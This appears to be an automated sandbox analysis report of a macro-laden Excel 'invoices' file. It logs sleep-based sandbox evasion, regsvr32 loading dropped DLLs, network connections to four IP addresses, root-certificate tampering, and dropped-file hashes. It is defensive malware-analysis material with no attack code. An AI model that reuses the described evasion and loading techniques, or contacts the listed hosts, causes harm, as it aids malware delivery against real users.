Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -317000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -152000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -522000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -588000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -172000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -127000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -131000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -252000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -160000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -163000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -134000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -313000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -133000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -271000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -161000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -164000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -153000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -175000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -170000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -343000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -171000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -261000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -126000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -139000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -345000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -256000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -334000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -311000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -172000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960	Thread sleep time: -147000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3068	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -122000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -124000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -148000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -178000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -257000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -130000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -170000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1036	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808	Thread sleep time: -136000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 194.225.58.214 187

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll

Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

ID:	342716
Product:	CloudBasic
Start time:	16:02:14
Start date:	21.01.2021
Sample:	1_Total New Invoices-Thursday January 21_2021.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	a52a88ae97dd408d38d98c9aa7f81142
SHA1:	234b65bc42a077c98c61a8eb4870d41e0039013e
SHA256:	c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608
Filetype:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 58936 bytes, 1 file	E4F1E21910443409E81E5B55DC8DE774	EC0885660BD216D0CDD5E6762B2F595376995BD0	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	D4AE187B4574036C2D76B6DF8A8C1A30	B06F409FA14BAB33CBAF4A37811B8740B624D9E5	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	DF1E09CF3775145C442F9FB0AB6C362A	1AE04CB8F8A23F05DA7CF04B831638D7ED73D439	DEE970688D1406C921AF17F7D8CB30E235E4B1A361A8B172E34D8CEBD4494C65
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	10E3FF0416066B18C49A1656EFABC8B0	11037AE57ED5FFD7695302D7F3BA7CD23E708759	96797ACFDC1A043CCF1D0FB07F8E331655A151C27B06FCE35D3F69EE6566D523
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	5589EA0025F3F1B4DDAC99B9DF2FD133	1F1F0189AEFC627A954C7FC30DD57AA65BBC1CBB	11D900EFD3629DF06B0FA04968E024F4C4CE5B2DC2BA231160712ACC7791B76E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4746FBED409F87EC6DDB6653CB4E201C	B8EE3F60F74553E44D42B0F47A0A4A55ED644C97	864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B613AB3EEF642E50999219C6BC103C24	D2DF29F7ACFC78B500217AF07BC69B558E08D12E	4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0A7945CBC0178E94E51FBFEB7E4B87EF	AD4DF936C9ABB4C956DF6FC37A6E3120A9E36603	3DA4558EEA9D229912F46D1D14906CB9837436A76AB81AAF8DB44182C9148BE8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4746FBED409F87EC6DDB6653CB4E201C	B8EE3F60F74553E44D42B0F47A0A4A55ED644C97	864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A64C1FA3.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	06CEB615EBA04193F1167A8E16D24D72	E3BEB08C64C56D72BD7E333EC25E7139A3639580	A1D83B13577385965D59963AF5C15DECA6DE97AAA0C0C0446EBB4F46EE340309
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B460DCA9.png	PNG image data, 200 x 254, 8-bit colormap, non-interlaced	7E8C8DDAE452014B6DAE41F13E3945EF	D70ECBB146F1BF78DA70A3D387EB1CDAF480CF9C	01C390937B5D91BC26ED089AB82DB7CC7B1CCDC712244F648EE1348FE15D0C46
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD638D48.png	PNG image data, 247 x 76, 8-bit colormap, non-interlaced	766C3D5E7B46F9106C4199126F75F1D6	E3BE7D184728E7CAD36ABFD1CB8291DBBE2DDB92	57ECD0C929D294F692E9EFE0BFDF14A047CBEA50994DA7BE0055023F13D516F2
C:\Users\user\AppData\Local\Temp\561F0000	data	32EF05AD85A38FACFA514BE77D73985F	E274BF14E01F0C655D048EB6DE0A0037832483AD	8E88147160B0DF345E79E07628EF2A2A67270EB64AADDB8725EAEF8164F7236D
C:\Users\user\AppData\Local\Temp\Cab290.tmp	Microsoft Cabinet archive data, 58936 bytes, 1 file	E4F1E21910443409E81E5B55DC8DE774	EC0885660BD216D0CDD5E6762B2F595376995BD0	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd	data	12CE50A0903414B6DAD881529AC9527F	893F555E08DB39287D1418353954DAC578E16FAF	068584F79F99C76B3B73E18EA25A5F0A0D4E56BE99D37D3A02361C9F5B2CBCAE
C:\Users\user\AppData\Local\Temp\Tar2A1.tmp	data	D0682A3C344DFC62FB18D5A539F81F61	09D3E9B899785DA377DF2518C6175D70CCF9DA33	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
C:\Users\user\AppData\Local\Temp\kxwni.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4746FBED409F87EC6DDB6653CB4E201C	B8EE3F60F74553E44D42B0F47A0A4A55ED644C97	864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
C:\Users\user\AppData\Local\Temp\nnmumzom.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	B613AB3EEF642E50999219C6BC103C24	D2DF29F7ACFC78B500217AF07BC69B558E08D12E	4BFDDDE9F8B6C92A2436385CEDF3F5ACF3A3284A22F40390A503DECAD56EECF9
C:\Users\user\AppData\Local\Temp\sxzjqf.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4746FBED409F87EC6DDB6653CB4E201C	B8EE3F60F74553E44D42B0F47A0A4A55ED644C97	864E95D36584E9DB7BCD7552272E446A4C7CBC6601DCD4F4A2687D96374B439B
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1_Total New Invoices-Thursday January 21_2021.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:08 2021, length=51781, window=hide	FEFCBF36C1DFE519C45CFEDA4FC5AC99	D238FB9334AC8B45E0EA60B70D7FA955F8E8621B	0AFB82F1D6FC4307FB3A61F4C04FD5601E393E317E3AFB6B7DF0E8375E6F47EC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Jan 21 23:03:04 2021, atime=Thu Jan 21 23:03:04 2021, length=8192, window=hide	AEE70929E31AB37A254C87326A7D0D3E	41D2F56B766B0A2BAA1F561F20FE4494CD70C389	E6B5213E4AF12E194107E0EFCA3863000D013FA579A65F119D22AE35E322A796
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	A187ABF37658D31C9E15AC193D5FAF74	8C6073CAD73B282337A4A21B4D44F253A32BD1A4	0C441D01B50C425D018E61E0DB13312E80330A56E3EB05B864C1515A775EF088
C:\Users\user\Desktop\863F0000	data	6C7B9B542ACB8B0B8AAFE9E97493588C	9979EEB156ED95B8006470CABB2561A8DC9306A7	ED7BE241973548AF186EA6D353EFE5A01C9F2631AF0BDB117C2259A282E70A4C
C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523

Analysis Report 1_Total New Invoices-Thursday January 21_2021.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs